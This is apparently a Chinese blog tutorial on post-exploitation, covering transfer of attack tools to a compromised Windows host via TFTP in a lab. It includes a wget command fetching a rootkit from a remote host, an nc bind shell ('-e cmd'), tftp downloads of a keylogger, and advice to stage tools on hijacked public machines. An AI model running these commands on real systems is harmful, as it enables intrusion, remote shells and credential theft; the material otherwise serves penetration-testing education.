后渗透阶段开始

2020-08-20 11:20:23 浏览数 (1)

经过之前的步骤,我们应该已经可以发现主机的漏洞,并且获取到一定的权限

下面就进入了后渗透测试阶段

在后渗透测试阶段我们主要的目标就是上传工具,权限提升,擦除攻击痕迹,安装持久化后门

以上的每一个步骤都至关重要!

上传工具


可能此时我们通过一个REC漏洞获取了一个shell,不过仅仅一个shell的功能是有限的,为了扩大战果,我们需要上传更为有力的工具,比如mimikatz,wce,为以后的攻击做准备

这里我们针对的系统主要是Windows和 Linux

在Linux上我们可以使用nc, curl, wget,这些在很多Linux发行版本中都是默认安装的,用来远程从我们的肉鸡上下载一个tool简直不能再方便了

wget http://123.123.34.3/rookit.exe

最简单的使用方法

所以我们接下来讲述的主要针对Windows

在Kali的 /usr/share/windows-binaries/ 文件夹下有一些Windows上常用的一些工具,比如键盘记录,whoami等

1.TFTP


TFTP是基于UDP协议的一个协议,与FTP协议类似,都可以提供文件传输

我们没有首先采用FTP协议来进行远程下载工具就是因为FTP需要交互输入密码,有时候我们获取到的shell并非交互的,所以很难实现

TFTP 是不需要身份验证的,也就是说服务器上有文件直接下载就行

TFTP 在XP和Win2003系统中是自动安装的,win2003还是有很大一部分服务器在使用的,所以我就以2003来进行演示

这个是安装win2003的截图,很熟悉的界面,上一次安装好想还是我在弄第一期培训

客户端安装完成后我们开始配置我们的TFTP服务器端,我们用Kali就可以完成这个服务器的假设

在假设服务器之前我们应该明确一点,我们的服务器不能被反黑掉,所以在权限控制和访问控制方面需要做一下限定

1. 新建一个目录

mkdir ~/tftp

2. 修改权限为nobody,这是一个未登录的权限,权限只能用来下载

chown –R nobody ~/tftp

3. 将我们需要传递的工具复制到目录中

cp /usr/share/windows-binaries/whoami.exe ~/tftp

4. 开启服务

atftpd --daemon --port 69 ~/tftp

--deamon 以后台形式启动

--port 端口是69

5. 检测服务是否成功开启

netstat –pantu | grep 69

#### 这里有一个问题,我必须强调一下

此处指定的路径必须是绝对路径,我在上面执行指定的是一个相对路径,这样会导致后续下载不到文件

所以上面应该变为

atftpd --daemon --port 69 /root/Desktop/tftp/

我们就用nc来在window2003上模拟一个非交互性的shell

nc.exe –lp 9999 –e cmd

遗憾的是我发现,在win2003r2 版本中并没有默认安装tftp

当我想要看看win2003版本时候发现没有可用的密钥,所以我就用一台XP来进行演示

nc.exe –lp 9999 –e cmd

这边我们用Kali的nc去连接一下,模拟出一个远程shell

我们在shell中执行

tftp -i 192.168.123.53 get whoami.exe

-i 二进制格式

tftp -i 192.168.123.53 get klogger.exe

可以看到已经下载成功了,之后我们执行一下看看效果吧

以上只是一个简单的小例子,通常来说我们应该把我们的程序放在公网上的一台肉鸡中,在攻击之前在肉鸡上开启服务,下载之后关闭。

更多方法敬请期待!

-END-

0 人点赞